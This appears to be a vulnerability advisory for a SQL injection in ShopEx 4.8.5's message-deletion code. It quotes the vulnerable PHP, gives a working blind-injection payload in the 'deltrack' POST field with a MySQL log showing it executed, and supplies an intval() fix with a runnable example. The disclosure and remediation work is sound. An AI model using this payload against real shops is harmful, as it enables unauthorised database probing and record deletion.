SQL injection vulnerability. Tested version: shopex-singel-4.8.5.78660. File: \core\shop\controller\ctl.member.php
    // Controller action: the raw $_POST['deltrack'] array is handed straight to the model
    function delTrackMsg() {
        if (!empty($_POST['deltrack'])) {
            $oMsg = &$this->system->loadModel('resources/msgbox');
            // no validation or casting of the submitted ids before this call
            $oMsg->delTrackMsg($_POST['deltrack']);
            $this->splash('success', $this->system->mkUrl("member", "track"), _('deleted successfully'));
        } else {
            $this->splash('failed', $this->system->mkUrl("member", "track"), _('deletion failed: no record selected!'));
        }
    }
Following $oMsg->delTrackMsg($_POST['deltrack']); into the file \core\model_v5\resources\mdl.msgbox.php:
    public function delTrackMsg($aMsgId) {
        $aTmp = array();
        // only empty values are filtered out; strings are kept as-is
        foreach ($aMsgId as $val) {
            if ($val) {
                $aTmp[] = $val;
            }
        }
        if ($aTmp) {
            // the ids are concatenated unquoted and unescaped into the IN (...) list
            $this->db->exec("DELETE FROM sdb_message WHERE msg_id IN (" . implode(",", $aTmp) . ") AND del_status='1'");
            $this->db->exec("UPDATE sdb_message SET del_status='2' WHERE msg_id IN (" . implode(",", $aTmp) . ")");
        }
        return true;
    }
The SQL injection in the DELETE statement is a real one. To verify it, submit the request and check whether the message is deleted. Request data: deltrack[1]=1) and (select count(*) from sdb_operators)=1%23. The SQL execution log shows:
130526 20:31:25 360 Connect root@localhost on
                360 Init DB shopex
                360 Query SET NAMES 'utf8'
                360 Query SELECT * FROM sdb_plugins WHERE plugin_type="app"
                360 Query select * from sdb_plugins where plugin_type="app" and plugin_ident='commodity_radar' LIMIT 0, 1
                360 Query select * from sdb_plugins where plugin_type="app" and plugin_ident='shopex_stat' LIMIT 0, 1
                360 Query select member_id,member_lv_id,email,uname,b_year,b_month,b_day,password,unreadmsg,cur,lang,point,experience from sdb_members where member_id=4 LIMIT 0, 1
                360 Query SELECT count(*) AS unreadmsg FROM sdb_message WHERE to_type = 0 AND del_status != '1' AND folder = 'inbox' AND unread = '0' AND to_id =4 LIMIT 0, 1
                360 Query SELECT plugin_name,plugin_ident FROM sdb_plugins WHERE 1 AND sdb_plugins.disabled = 'false' AND sdb_plugins.plugin_type='app' LIMIT 0, 20
                360 Query SELECT plugin_id,plugin_path,plugin_struct,plugin_config,plugin_base FROM sdb_plugins WHERE plugin_type='app' AND plugin_ident='commodity_radar' LIMIT 0, 1
                360 Query SELECT plugin_id,plugin_path,plugin_struct,plugin_config,plugin_base FROM sdb_plugins WHERE plugin_type='app' AND plugin_ident='shopex_stat' LIMIT 0, 1
                360 Query SELECT plugin_id,plugin_path,plugin_struct,plugin_config,plugin_base FROM sdb_plugins WHERE plugin_type='app' AND plugin_ident='pay_offline' LIMIT 0, 1
                360 Query DELETE FROM sdb_message WHERE msg_id IN (1) and (select count(*) from sdb_operators)=1#) AND del_status='1'
The statement executed successfully, which proves the vulnerability: because (select count(*) from sdb_operators)=1 is true, the record with msg_id=1 is deleted. Let's guess...
Solution:
Cast each submitted id with intval() before it is placed in the IN (...) list.
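The intval() fix applied to delTrackMsg(), as an added example that is not ShopEx's own code; $exec is an assumed stand-in for $this->db->exec so the function runs without a database, and the input array is constructed to mirror the request above:

```php
<?php
// Added example (not ShopEx code): mdl.msgbox.php::delTrackMsg() with the
// report's proposed fix. $exec is an assumed stand-in for $this->db->exec.

/**
 * Each id is cast with intval() before it reaches the query string, so only an
 * integer can ever be interpolated; values that cast to 0 are dropped.
 */
function delTrackMsgSafe(array $aMsgId, callable $exec)
{
    $aTmp = array();
    foreach ($aMsgId as $val) {
        $id = intval($val);      // "1) and (select ...)#" collapses to 1, "abc" to 0
        if ($id > 0) {
            $aTmp[] = $id;
        }
    }
    if ($aTmp) {
        $in = implode(",", $aTmp);
        $exec("DELETE FROM sdb_message WHERE msg_id IN (" . $in . ") AND del_status='1'");
        $exec("UPDATE sdb_message SET del_status='2' WHERE msg_id IN (" . $in . ")");
    }
    return true;
}

// Constructed input: what $_POST['deltrack'] holds for the request in the report,
// plus one normal id and one non-numeric value.
$deltrack = array(
    1 => "1) and (select count(*) from sdb_operators)=1#",
    2 => "7",
    3 => "abc",
);

$executed = array();
delTrackMsgSafe($deltrack, function ($sql) use (&$executed) {
    $executed[] = $sql;          // record instead of executing
});

foreach ($executed as $sql) {
    echo $sql, PHP_EOL;
}
```

Both printed statements contain only IN (1,7): the injected string is reduced to the integer 1 and the non-numeric value is discarded, so the subquery never reaches MySQL.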